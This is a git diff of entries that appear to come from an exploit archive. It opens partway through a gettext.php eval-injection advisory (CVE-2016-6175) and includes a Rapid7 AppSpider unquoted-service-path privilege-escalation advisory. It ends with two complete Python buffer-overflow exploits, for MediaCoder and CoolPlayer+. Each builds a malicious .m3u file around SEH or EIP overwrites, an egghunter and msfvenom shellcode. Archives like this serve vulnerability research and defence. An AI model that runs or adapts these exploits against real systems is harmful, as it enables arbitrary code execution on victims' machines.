str_replace('nplurals',"\$total",$res); +$string = str_replace("n",$res,$res); +$string = str_replace('plural',"\$plural",$res); +eval("$string"); +?> + + +V. RECOMMENDATIONS + +As explained in the associated « bug track », it was assumed that PO and MO files would come from untrusted translators. +Check the permissions on PO/MO files in order to ensure the provenance and the fact that is only accessible from trusted parties. +The project's members are writing a new version that will patch this issue definitively, thank you to respect their work and to apply this temporary fix. + + + +VI. VERSIONS AFFECTED + +This issue affect the latest GETTEXT .PHP version and were found in latest stable NAGVIS (1.8.5) version. +It could affect the a lot of web application and/or many website as long as it will not be updated. + + +VII. TIMELINE + +June 21th, 2016: Vulnerability identification +June 21th, 2016: Nagvis project developers and gettext.php developers notification +June 22th, 2016: Nagvis project developers response +June 25th, 2016: Nagvis Patch release (even if not really affected) +June 27th, 2016: Gettext.php team response (from Danilo ?egan), exchange started +July 5th, 2016: CVE request ID (mitre) and OVE ID request +July 7th, 2016: CVE-2016-6175 attributed by MITRE +July 25th, 2016: Public disclosure + + +VIII. LEGAL NOTICES + +The information contained within this advisory is supplied "as-is" with +no warranties or guarantees of fitness of use or otherwise. +I accept no responsibility for any damage caused by the use or misuse of this advisory. diff --git a/platforms/windows/local/40145.txt b/platforms/windows/local/40145.txt new file mode 100755 index 000000000..4b94910e0 --- /dev/null +++ b/platforms/windows/local/40145.txt @@ -0,0 +1,90 @@ + +Rapid7 AppSpider 6.12 Web Application Vulnerability Scanner Elevation Of Privilege + + +Vendor: Rapid7, Inc. +Product web page: https://www.rapid7.com +Affected version: 6.12.10.1 + +Summary: While today's malicious attackers pursue a variety of +goals, they share a preferred channel of attack - the millions +of custom web, mobile, and cloud applications companies deploy +to serve their customers. AppSpider dynamically scans these +applications for vulnerabilities across all modern technologies, +provides tools that speed remediation, and monitors applications +for changes. + +Desc: The application suffers from an unquoted search path issue +impacting the services 'AppSpider REST Server', 'AppSpider REST Service' +and 'AppSpiderUpgradeService' for Windows deployed as part of AppSpider +solution. This could potentially allow an authorized but non-privileged +local user to execute arbitrary code with elevated privileges on the +system. A successful attempt would require the local user to be able to +insert their code in the system root path undetected by the OS or other +security applications where it could potentially be executed during +application startup or reboot. If successful, the local user’s code +would execute with the elevated privileges of the application. + +Tested on: Microsoft Windows 7 Professional SP1 (EN) + Microsoft Windows 7 Ultimate SP1 (EN) + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2016-5344 +Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5344.php + +Vendor: https://community.rapid7.com/docs/DOC-3455 + + +05.07.2016 + +-- + + +C:\>sc qc "AppSpider REST Server" +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: AppSpider REST Server + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : C:\Program Files (x86)\Rapid7\AppSpider6\restserviceworker\WebWindowsService.exe + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : AppSpider REST Server + DEPENDENCIES : + SERVICE_START_NAME : NT AUTHORITY\NetworkService + + +C:\>sc qc "AppSpider REST Service" +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: AppSpider REST Service + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : C:\Program Files (x86)\Rapid7\AppSpider6\RestService\WebService.exe + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : AppSpider REST Service + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem + + +C:\>sc qc AppSpiderUpgradeService +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: AppSpiderUpgradeService + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 3 DEMAND_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : C:\Program Files (x86)\Rapid7\AppSpider6\AppSpiderUpgradeService\AppSpiderUpgradeService.exe + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : AppSpiderUpgradeService + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem + diff --git a/platforms/windows/local/40148.py b/platforms/windows/local/40148.py new file mode 100755 index 000000000..7a0e125bf --- /dev/null +++ b/platforms/windows/local/40148.py @@ -0,0 +1,58 @@ +# Exploit Title: [MediaCoder 0.8.43.5852 - .m3u SEH Exploit] +# Exploit Author: [Karn Ganeshen] +# Vendor Homepage: [http://www.mediacoderhq.com] +# Download link: [http://www.mediacoderhq.com/mirrors.html?file=MediaCoder-0.8.45.5852.exe] +# Version: [Current version 0.8.43.58.52] +# Tested on: [Windows Vista SP2] +# + +#!/usr/bin/python + +total_buf = 5000 + +# msfvenom -a x86 --platform Windows -p windows/exec CMD=calc.exe -e x86/alpha_upper -b '\x00\x0a\x0d\xff' -f c +# Payload size: 455 bytes + +shellcode = ("\x89\xe1\xda\xcc\xd9\x71\xf4\x5e\x56\x59\x49\x49\x49\x49\x43" +"\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34" +"\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41" +"\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58" +"\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4d\x38\x4c\x42\x55\x50" +"\x45\x50\x35\x50\x53\x50\x4c\x49\x4b\x55\x46\x51\x59\x50\x55" +"\x34\x4c\x4b\x30\x50\x56\x50\x4c\x4b\x31\x42\x54\x4c\x4c\x4b" +"\x46\x32\x44\x54\x4c\x4b\x32\x52\x47\x58\x34\x4f\x58\x37\x50" +"\x4a\x47\x56\x50\x31\x4b\x4f\x4e\x4c\x37\x4c\x43\x51\x53\x4c" +"\x53\x32\x36\x4c\x51\x30\x59\x51\x58\x4f\x34\x4d\x35\x51\x48" +"\x47\x4a\x42\x5a\x52\x36\x32\x46\x37\x4c\x4b\x56\x32\x52\x30" +"\x4c\x4b\x50\x4a\x57\x4c\x4c\x4b\x50\x4c\x52\x31\x32\x58\x4d" +"\x33\x30\x48\x33\x31\x38\x51\x46\x31\x4c\x4b\x50\x59\x31\x30" +"\x33\x31\x49\x43\x4c\x4b\x30\x49\x55\x48\x5a\x43\x36\x5a\x47" +"\x39\x4c\x4b\x30\x34\x4c\x4b\x45\x51\x39\x46\x36\x51\x4b\x4f" +"\x4e\x4c\x59\x51\x48\x4f\x44\x4d\x53\x31\x58\x47\x56\x58\x4d" +"\x30\x33\x45\x4b\x46\x54\x43\x43\x4d\x4c\x38\x47\x4b\x53\x4d" +"\x37\x54\x54\x35\x5a\x44\x51\x48\x4c\x4b\x30\x58\x57\x54\x35" +"\x51\x4e\x33\x55\x36\x4c\x4b\x54\x4c\x30\x4b\x4c\x4b\x56\x38" +"\x45\x4c\x43\x31\x58\x53\x4c\x4b\x55\x54\x4c\x4b\x35\x51\x48" +"\x50\x4b\x39\x51\x54\x56\x44\x46\x44\x51\x4b\x31\x4b\x43\x51" +"\x46\x39\x30\x5a\x46\x31\x4b\x4f\x4d\x30\x51\x4f\x51\x4f\x31" +"\x4a\x4c\x4b\x52\x32\x4a\x4b\x4c\x4d\x51\x4d\x52\x4a\x43\x31" +"\x4c\x4d\x4c\x45\x4f\x42\x43\x30\x55\x50\x33\x30\x30\x50\x33" +"\x58\x56\x51\x4c\x4b\x32\x4f\x4d\x57\x4b\x4f\x48\x55\x4f\x4b" +"\x4a\x50\x38\x35\x4e\x42\x31\x46\x53\x58\x49\x36\x5a\x35\x4f" +"\x4d\x4d\x4d\x4b\x4f\x4e\x35\x47\x4c\x43\x36\x33\x4c\x35\x5a" +"\x4b\x30\x4b\x4b\x4d\x30\x44\x35\x33\x35\x4f\x4b\x31\x57\x44" +"\x53\x52\x52\x52\x4f\x33\x5a\x33\x30\x36\x33\x4b\x4f\x58\x55" +"\x42\x43\x45\x31\x52\x4c\x35\x33\x56\x4e\x55\x35\x54\x38\x32" +"\x45\x53\x30\x41\x41") + +junk = "http:// " +junk += "A"*784 +nseh = "\xEB\x06\x90\x90" +seh = "\x38\x78\x01\x66" # PPR - 0x66017838 - libiconv-2.dll +evil = junk + nseh + seh +evil += "\x90"*50 + shellcode +evil += "\x90"*3000 + +file = open("evil.m3u", "wb") +file.write (evil) +file.close() diff --git a/platforms/windows/local/40151.py b/platforms/windows/local/40151.py new file mode 100755 index 000000000..189b61c9a --- /dev/null +++ b/platforms/windows/local/40151.py @@ -0,0 +1,53 @@ +# Exploit Title: [CoolPlayer+ Portable build 2.19.6 - .m3u Stack Overflow [Egghunter+ASLR bypass]] +# Exploit Author: [Karn Ganeshen] +# Download link: [https://sourceforge.net/projects/portableapps/files/CoolPlayer%2B%20Portable/CoolPlayerPlusPortable_2.19.6.paf.exe/download?use_mirror=liquidtelecom] +# Version: [Current version 2.19.6] +# Tested on: [Windows Vista Ultimate SP2] +# +# Couple of bof exploits for older versions already on EDB: +# https://www.exploit-db.com/search/?action=search&description=coolplayer + +#!/usr/bin/python + +total_buf = 2000 + +filename="evil.m3u" + +# msfvenom -p windows/exec cmd=calc.exe -b \x00\x0a\x0c\0d EXITFUN=thread -f c +# Payload size: 220 bytes + +shellcode = ("\xdb\xdc\xd9\x74\x24\xf4\x58\xbb\x9a\xc7\xdb\xe9\x31\xc9\xb1" +"\x31\x31\x58\x18\x83\xe8\xfc\x03\x58\x8e\x25\x2e\x15\x46\x2b" +"\xd1\xe6\x96\x4c\x5b\x03\xa7\x4c\x3f\x47\x97\x7c\x4b\x05\x1b" +"\xf6\x19\xbe\xa8\x7a\xb6\xb1\x19\x30\xe0\xfc\x9a\x69\xd0\x9f" +"\x18\x70\x05\x40\x21\xbb\x58\x81\x66\xa6\x91\xd3\x3f\xac\x04" +"\xc4\x34\xf8\x94\x6f\x06\xec\x9c\x8c\xde\x0f\x8c\x02\x55\x56" +"\x0e\xa4\xba\xe2\x07\xbe\xdf\xcf\xde\x35\x2b\xbb\xe0\x9f\x62" +"\x44\x4e\xde\x4b\xb7\x8e\x26\x6b\x28\xe5\x5e\x88\xd5\xfe\xa4" +"\xf3\x01\x8a\x3e\x53\xc1\x2c\x9b\x62\x06\xaa\x68\x68\xe3\xb8" +"\x37\x6c\xf2\x6d\x4c\x88\x7f\x90\x83\x19\x3b\xb7\x07\x42\x9f" +"\xd6\x1e\x2e\x4e\xe6\x41\x91\x2f\x42\x09\x3f\x3b\xff\x50\x55" +"\xba\x8d\xee\x1b\xbc\x8d\xf0\x0b\xd5\xbc\x7b\xc4\xa2\x40\xae" +"\xa1\x5d\x0b\xf3\x83\xf5\xd2\x61\x96\x9b\xe4\x5f\xd4\xa5\x66" +"\x6a\xa4\x51\x76\x1f\xa1\x1e\x30\xf3\xdb\x0f\xd5\xf3\x48\x2f" +"\xfc\x97\x0f\xa3\x9c\x79\xaa\x43\x06\x86") + +# Egghunter - 32 bytes +eggh = ("\x66\x81\xca\xff\x0f\x42\x52\x6a" +"\x02\x58\xcd\x2e\x3c\x05\x5a\x74" +"\xef\xb8\x54\x30\x30\x57\x8b\xfa" +"\xaf\x75\xea\xaf\x75\xe7\xff\xe7") + +# EIP overwrite appears to depend upon location from where the evil file is loaded from +# Tested from location - C:\ +# For e.g. offset will be different if file is loaded from C: (260) vs C:\Windows\ (249) + +junk = "A"*28 +eip = "\xa1\x99\x42\x00" # 0x004299a1 jmp ebx - coolplayer+.exe [noaslr,norebase,nosafeseh] + +evil = junk + eggh + "\x90"*200 + eip + "\x90"*18 + "T00WT00W" + shellcode + "\x90"*1490 + +file = open(filename , 'w') +file.write(evil) +file.close() +